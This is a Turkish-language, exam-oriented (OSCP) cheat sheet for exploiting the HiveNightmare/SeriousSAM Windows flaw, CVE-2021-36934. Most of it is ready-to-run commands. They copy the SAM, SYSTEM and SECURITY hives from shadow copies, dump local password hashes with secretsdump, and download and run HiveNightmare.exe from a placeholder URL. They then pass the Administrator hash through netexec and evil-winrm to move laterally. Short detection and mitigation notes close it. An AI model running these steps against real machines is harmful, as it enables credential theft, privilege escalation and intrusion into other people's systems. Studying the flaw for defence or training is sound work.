HiveNightmare / SeriousSAM (CVE-2021-36934) — Okunabilir SAM/SYSTEM Shadow Kopyalari
Windows 10/11'de hatali ACL'ler nedeniyle SAM, SYSTEM ve SECURITY registry hive'lari standart kullanicilar tarafindan okunabilir hale gelir. Volume Shadow Copy uzerinden bu hive'lar kopyalanip secretsdump ile yerel hesap hash'leri (Administrator dahil) cikarilir.
- Windows 10 1809+ veya Windows 11 (zafiyetli build)
- Dusuk yetkili interaktif kullanici oturumu
- En az bir System Restore Point / Volume Shadow Copy mevcut (genelde otomatik olusur)
- Cikarilan hash'leri kullanmak icin SMB/WinRM erisimi (pass-the-hash)
Komutlar
icacls C:\Windows\System32\config\SAM vssadmin list shadows copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Temp\SECURITY impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Invoke-WebRequest -Uri {{URL}}/HiveNightmare.exe -OutFile C:\Temp\hn.exe; C:\Temp\hn.exe netexec smb {{RHOST}} -u Administrator -H {{NTHASH}} evil-winrm -i {{RHOST}} -u Administrator -H {{NTHASH}} Genel Bakis
HiveNightmare (resmi adi SeriousSAM, CVE-2021-36934), belirli Windows 10 (1809+) ve Windows 11 build’lerinde C:\Windows\System32\config altindaki SAM, SYSTEM ve SECURITY registry hive’larina uygulanan ACL’lerin hatali sekilde gevsek olmasidir. Normalde sadece SYSTEM ve Administrators bu dosyalari okuyabilirken, zafiyetli sistemlerde BUILTIN\Users grubuna okuma izni verilir. Bu, herhangi bir standart kullanicinin yerel hesap parola hash’lerini (yerel Administrator dahil) ele gecirip SYSTEM’a yukselmesine olanak tanir.
Canli hive dosyalari calisirken kilitli oldugundan dogrudan okunamaz; bu yuzden Volume Shadow Copy (VSS) snapshot’larindaki kopyalar kullanilir. Sistemde System Protection acik oldugunda (cogu kurulumda varsayilan) en az bir shadow copy bulunur.
Tespit / Enumeration
Zafiyeti dogrulamanin en hizli yolu ACL kontroludur:
icacls C:\Windows\System32\config\SAM
Ciktida BUILTIN\Users:(I)(RX) benzeri bir satir gorurseniz sistem zafiyetlidir. Ardindan vssadmin list shadows ile erisilebilir shadow copy’leri listeleyin ve HarddiskVolumeShadowCopyN indeksini not edin. Genellikle ilk snapshot (...ShadowCopy1) ise yarar.
Somuru
Uc hive’i da bir shadow copy’den yazilabilir bir dizine (C:\Temp) kopyalayin. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\... yolu, kilitli canli dosyayi degil snapshot kopyasini hedefler, bu yuzden standart kullanici olarak kopyalama basarili olur. Snapshot indeksi sistemde farkliysa 1 yerine dogru numarayi kullanin.
Alternatif olarak GossiTheDog/HiveNightmare.exe veya mimikatz (misc::shadowcopies / token komutlari) tum snapshot’lari otomatik tarayarak hive’lari ceker; manuel kontrol icin yukaridaki copy yontemi sinavda en guvenilir olanidir.
Hash Cikarma ve Yanal Hareket
Kopyalanan hive’lari Kali’ye aktardiktan sonra impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL ile offline olarak NTLM hash’lerini cikarin. SYSTEM hive’i boot key icin zorunludur; SECURITY hive’i ise LSA secret’lari ve cache’lenmis kimlik bilgileri saglar. Elde edilen yerel Administrator hash’i ile pass-the-hash yaparak NetExec/evil-winrm uzerinden admin oturumu acabilir veya ayni hash’in yeniden kullanildigi diger makinelere yanal hareket edebilirsiniz.
OSCP Notlari ve Hafifletme
- Tum adimlar manuel ve sinav guvenlidir; otomatik exploit veya Metasploit gerekmez.
- Hash dogrudan plaintext parola degildir; ya pass-the-hash kullanin ya da
hashcat -m 1000ile kirmayi deneyin. - Hafifletme:
icacls %windir%\system32\config\*.* /inheritance:eile ACL’leri sifirlamak vevssadmin delete shadows /allile eski snapshot’lari silmek gerekir; sadece yama yetmez cunku eski shadow copy’ler hatali ACL’yi korur. - Shadow copy yoksa somuru calismaz; bu durumda win-sebackup-restore veya diger yontemleri degerlendirin.